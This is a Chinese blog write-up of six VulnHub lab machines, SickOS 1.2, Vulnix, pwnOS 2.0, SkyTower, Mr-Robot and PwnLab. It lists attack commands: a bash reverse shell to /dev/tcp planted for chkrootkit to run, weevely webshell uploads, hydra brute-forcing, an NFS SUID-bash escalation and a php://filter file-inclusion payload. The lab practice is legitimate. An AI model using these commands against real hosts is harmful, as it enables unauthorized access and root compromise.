vulnhub 3

目录

sickos-12,144

1.端口扫描

​2.查看web服务

3.利用Put上传webshell

​4.查看计划任务

​5.利用exp提权

hacklab-vulnix,48

1.端口扫描

​2.使用smtp-user-enum  爆破用户名

​3.对nfs的渗透

​4.使用vulnix账号登录ssh

5.提权

pwnos-20-pre-release,34

1.端口扫描

​2.爆破web目录,查看info.php,/blog页面

3.上传shell

4.查看mysql配置文件

skytower-1,96

1.端口扫描

​2.查看web页面,登录页面存在sql注入

3.登录ssh

​4.查看数据库文件

​5.ssh登录sara账号

mr-robot-1,151

1.端口扫描

​2.使用gobuster扫描网站并查看robots

​3.登录wordpress上传shell

​4.nmap提权

pwnlab-init,158

1.端口扫描

​2.web服务存在本地文件包含,

​3.连接mysql

​4.登录web,上传图片马

​访问index.php,将图片路径加入cookie进行访问,反弹shell

​5.测试三个用户,并提权


sickos-12,144

1.端口扫描

vulnhub 3_第1张图片

2.查看web服务

vulnhub 3_第2张图片

访问url下的test目录,该网站为lighttpd/1.4.28,寻找exp未发现适合版本

vulnhub 3_第3张图片

使用curl查看是否存在PUT上传漏洞

curl -vvv -X OPTIONS http://192.168.43.169/test/

vulnhub 3_第4张图片

3.利用Put上传webshell

weevely generate aa ./te.php
weevely http://192.168.43.169/test/te.php aa

vulnhub 3_第5张图片

vulnhub 3_第6张图片

4.查看计划任务

ls -la /etc/cron.daily
chkrootkit -V

vulnhub 3_第7张图片

5.利用exp提权

靶机的Chkrootkit会周期性以root身份执行目录/tmp/update的文件,如果没有这个文件就创建

printf '#!/bin/bash\nbash -i >& /dev/tcp/192.168.43.2/8080 0>&1\n' > /tmp/update
cd /tmp
chmod +x update
ls -la

vulnhub 3_第8张图片

vulnhub 3_第9张图片

 

 

 

hacklab-vulnix,48

1.端口扫描

vulnhub 3_第10张图片

 

2.使用smtp-user-enum  爆破用户名

./smtp-user-enum.pl -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 192.168.43.36

vulnhub 3_第11张图片

 

finger [email protected]    #使用finger测试用户名是否存在
hydra -l user -P rockyou.txt 192.168.43.36 ssh -t 4

vulnhub 3_第12张图片

 

3.对nfs的渗透

vulnhub 3_第13张图片

 

mkdir /tmp/nfs
showmount -e 192.168.43.36    
mount -t nfs 192.168.43.36:/home/vulnix /tmp/nfs     #挂载到本地

创建账号

kali:
useradd -u 2008 vulnix
su vulnix 
$ mkdir .ssh
$ cd .ssh
$ echo ssh-rsa ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/eRJKDUONqQ0pLo24lhyZZ9F5/FN1k8bps96SiVaf9QsqOSlWd2xcLpqVWjm6G0yioHptFZJ1E/yRb267JdJLWesortSD9ZKrNJv2/yJElKT2NT+oR9S5ZzVEIZuVsIVOzGJEZsr6IJVOVX2se9WixA+nT5YhH5yt5fLz8Aygneej7iUx/OcgQHrbkySzUBSFGdekj8so5NranSvHH+64esQEES+DpApkhYpNKDVbvuh5Tay4uGDZKP4i0O/hg4QJSmP6OUmj3AYxQGDxRpGiw1wzzz1ZauaavWbu9DFcmCI/GTVtpcmGuCFNSqhXj3OtoNnOZ0/zO8g+0tGkr/VrQWYCItY4Th3WNogizkpeVfma8qr2r9/u8CWsphdQxAjlGaA.. > authorized_keys    #将生成的公钥复制粘贴到此处

ssh-keygen 
cd /root/.ssh 
cat id_rsa.pub 

vulnhub 3_第14张图片

vulnhub 3_第15张图片

 

4.使用vulnix账号登录ssh

vulnhub 3_第16张图片

 

将/etc/exports最后一行更改为如下内容。curl+^O保存

vulnhub 3_第17张图片

 

复制bash命令到当前目录 ,重启靶机。

vulnhub 3_第18张图片

重新挂载到本机,kali上切换至root用户进入挂载好的nfs目录,使用chown命令将其更改为root权限,然后再次退出使用用户vulnix登录进行执行提权

┌──(rootkali)-[/tmp]
└─# mount -t nfs 192.168.43.36:/home/vulnix /tmp/nfs

└─# chown root.root /tmp/nfs/bash                                                                                                                                                       
                                                                                                                                                                                            
┌──(rootkali)-[/tmp]
└─# ls -la /tmp/nfs  

vulnhub 3_第19张图片

5.提权

vulnhub 3_第20张图片

 

 

pwnos-20-pre-release,34

 

1.端口扫描

vulnhub 3_第21张图片

 

2.爆破web目录,查看info.php,/blog页面

vulnhub 3_第22张图片

blog的源代码中显示sphpblog,msf中搜索sphp

vulnhub 3_第23张图片

vulnhub 3_第24张图片

exp未利用成功,创建了一个临时用户rSpyid,登录账号

vulnhub 3_第25张图片

3.上传shell

http://10.10.10.100/blog/upload_img.php登录账号发现有上传图片页面,上传php文件尝试。

vulnhub 3_第26张图片

访问上传文件并成功收到反弹shell

vulnhub 3_第27张图片

4.查看mysql配置文件

vulnhub 3_第28张图片

查看上级目录,发现一样的配置文件,使用其中的密码成功切换到root用户

vulnhub 3_第29张图片

 

 

 

skytower-1,96

1.端口扫描

vulnhub 3_第30张图片

 

2.查看web页面,登录页面存在sql注入

vulnhub 3_第31张图片

3.登录ssh

由于22端口被过滤,可以选择3128端口代理登录

proxytunnel -p 192.168.43.93:3128 -d 127.0.0.1:22 -a 8888 
ssh 127.0.0.1 -l john -p 8888


使用socat进行端口转发目标代理端口3128
socat TCP-LISTEN:8888,reuseaddr,fork PROXY:192.168.43.93:127.0.0.1:22,proxyport=3128
使用proxychains进行操作,配置成http代理

vulnhub 3_第32张图片

vulnhub 3_第33张图片

ssh 127.0.0.1 -l john -p 8888 mv .bashrc .bashrc.bak     #文件改名或者nc登录

vulnhub 3_第34张图片

无法进行sudo提权,查看其它用户和网站配置文件

vulnhub 3_第35张图片

 

4.查看数据库文件

vulnhub 3_第36张图片

vulnhub 3_第37张图片

5.ssh登录sara账号

vulnhub 3_第38张图片

sudo cat /accounts/../root/flag.txt    #访问绝对目录

vulnhub 3_第39张图片

 

mr-robot-1,151

1.端口扫描

vulnhub 3_第40张图片

2.使用gobuster扫描网站并查看robots

gobuster dir -u http://192.168.43.51 -w /usr/share/wordlists/dirbuster/directory-list

vulnhub 3_第41张图片

密码字典进去去重
wc -l fsocity.dic
sort -u fsocity.dic | wc -l
sort -u fsocity.dic > fsocity_sort.dic
先随便使用一个密码,然后使用上面的字典去尝试猜测用户名
hydra -L fsocity_sort.dic -p cdxf 192.168.43.51 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username" -t 50 -f -V

vulnhub 3_第42张图片

密码爆破

wpscan --url http://192.168.43.51 -U elliot -P /home/kali/13/fsocity.sort.dic

hydra -vV -l elliot -P fsocity_sort.dic 192.168.43.51 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=is incorrect"

 

3.登录wordpress上传shell

vulnhub 3_第43张图片

vulnhub 3_第44张图片

查看家目录下的用户及文件,发现robot的md5密码,切换至robot

vulnhub 3_第45张图片

横向移动到另一个用户之后看能不能使用sudo提权,或者被赋予了setuid的权限文件进行提权,使用find命令查找
ls -alt `find / -perm -4000 -type f 2>/dev/null`

4.nmap提权

进入Nmap命令行模式,成功查看到flag

vulnhub 3_第46张图片

 

 

pwnlab-init,158

1.端口扫描

vulnhub 3_第47张图片

2.web服务存在本地文件包含,

参考链接https://github.com/SewellDinG/LFIboomCTF

http://192.168.43.80/?page=php://filter/convert.base64-encode/resource=config                    base64解码

vulnhub 3_第48张图片

3.连接mysql

vulnhub 3_第49张图片

 

4.登录web,上传图片马

访问index.php,将图片路径加入cookie进行访问,反弹shell

vulnhub 3_第50张图片

5.测试三个用户,并提权

vulnhub 3_第51张图片

vulnhub 3_第52张图片

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

你可能感兴趣的:(靶机)